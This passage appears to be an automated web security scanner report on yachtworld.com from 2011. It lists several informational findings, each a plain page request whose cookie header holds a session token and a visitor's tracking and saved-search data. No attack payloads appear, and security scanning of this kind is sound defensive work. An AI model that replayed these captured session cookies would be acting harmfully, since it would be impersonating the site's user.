<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...

16.11. https://www.yachtworld.com/core/globalnav/emailForm.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/globalnav/emailForm.jsp

Request

GET /core/globalnav/emailForm.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:57:18 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...

16.12. https://www.yachtworld.com/core/globalnav/help.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/globalnav/help.jsp

Request

GET /core/globalnav/help.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:57:28 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...

16.13. https://www.yachtworld.com/core/globalnav/localeSelect.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/globalnav/localeSelect.jsp

Request

GET /core/globalnav/localeSelect.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:57:14 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...

16.14. https://www.yachtworld.com/core/globalnav/privacy.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/globalnav/privacy.jsp

Request

GET /core/globalnav/privacy.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

16.15. https://www.yachtworld.com/core/globalnav/termOfUse.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/globalnav/termOfUse.jsp

Request

GET /core/globalnav/termOfUse.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

16.16. https://www.yachtworld.com/core/listing/advancedSearch.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.yachtworld.com
Path:	/core/listing/advancedSearch.jsp

Request

GET /core/listing/advancedSearch.jsp HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A30PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B; boats_temp_info=lf:ywlf; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=4318294598094503882; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimage